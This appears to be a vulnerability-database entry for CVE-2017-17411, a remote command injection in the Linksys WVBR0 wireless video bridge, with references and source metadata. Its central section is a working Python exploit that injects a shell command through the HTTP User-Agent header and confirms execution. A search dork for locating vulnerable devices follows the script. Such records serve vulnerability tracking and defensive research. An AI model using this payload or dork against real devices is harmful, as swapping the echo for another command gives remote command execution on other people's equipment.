Sign-up

ID

VAR-E-201712-0127


CVE

cve_id:CVE-2017-17411

Trust: 1.8

sources: BID: 102212 // PACKETSTORM: 145640 // EXPLOIT-DB: 43363

EDB ID

43363


TITLE

Linksys WVBR0 - 'User-Agent' Remote Command Injection - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 43363

DESCRIPTION

Linksys WVBR0 - 'User-Agent' Remote Command Injection. CVE-2017-17411 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 43363

AFFECTED PRODUCTS

vendor:linksysmodel:wvbr0scope: - version: -

Trust: 1.6

vendor:linksysmodel:wvbr0-25 user-agentscope: - version: -

Trust: 0.5

vendor:linksysmodel:wvbr0scope:eqversion:25

Trust: 0.3

sources: BID: 102212 // PACKETSTORM: 145640 // EXPLOIT-DB: 43363 // EDBNET: 95390

EXPLOIT

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection

"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>

$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""

import requests

def check(url):
payload = '"; echo "admin'
md5hash = "456b7016a916a4b178dd72b947c152b7" # echo "admin" | md5sum

resp = send_http_request(url, payload)

if not resp:
return False

lines = resp.text.splitlines()
sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)

if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
return False

if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
return False

print("[+] Target is exploitable by CVE-2017-17411 ")
return True

def send_http_request(url, payload):
headers = {
'User-Agent': payload
}

response = None
try:
response = requests.get(url, headers=headers)
except Exception as err:
log.exception(err)

return response

if __name__ == '__main__':
import sys

if len(sys.argv) != 2:
print("[*] Usage: python %s <URL>" % sys.argv[0])
sys.exit(0)

check(sys.argv[1])

# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"

## References

# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html

Trust: 1.0

sources: EXPLOIT-DB: 43363

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 43363

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 43363

TYPE

'User-Agent' Remote Command Injection

Trust: 1.6

sources: EXPLOIT-DB: 43363 // EDBNET: 95390

TAGS

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

sources: PACKETSTORM: 145640

CREDITS

nixawk

Trust: 0.6

sources: EXPLOIT-DB: 43363

EXTERNAL IDS

db:NVDid:CVE-2017-17411

Trust: 1.8

db:EXPLOIT-DBid:43363

Trust: 1.6

db:EDBNETid:95390

Trust: 0.6

db:PACKETSTORMid:145640

Trust: 0.5

db:ZDIid:ZDI-17-973

Trust: 0.3

db:BIDid:102212

Trust: 0.3

sources: BID: 102212 // PACKETSTORM: 145640 // EXPLOIT-DB: 43363 // EDBNET: 95390

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-17411

Trust: 1.5

url:https://github.com/nixawk/labs/blob/5777612e4a7d06f4e1811ca654bcb22c050078bf/cve-2017-17411/exploit-cve-2017-17411.py

Trust: 1.0

url:https://www.exploit-db.com/exploits/43363/

Trust: 0.6

url:http://www.zerodayinitiative.com/advisories/zdi-17-973/

Trust: 0.3

url:https://www.linksys.com

Trust: 0.3

url:https://github.com/nixawk/labs/blob/master/cve-2017-17411/exploit-cve-2017-17411.py

Trust: 0.3

url:https://github.com/rapid7/metasploit-framework/issues/9304

Trust: 0.3

sources: BID: 102212 // PACKETSTORM: 145640 // EXPLOIT-DB: 43363 // EDBNET: 95390

SOURCES

db:BIDid:102212
db:PACKETSTORMid:145640
db:EXPLOIT-DBid:43363
db:EDBNETid:95390

LAST UPDATE DATE

2022-07-27T09:58:23.576000+00:00


SOURCES UPDATE DATE

db:BIDid:102212date:2017-12-19T21:01:00

SOURCES RELEASE DATE

db:BIDid:102212date:2017-12-18T00:00:00
db:PACKETSTORMid:145640date:2018-01-04T01:01:48
db:EXPLOIT-DBid:43363date:2017-12-14T00:00:00
db:EDBNETid:95390date:2017-12-18T00:00:00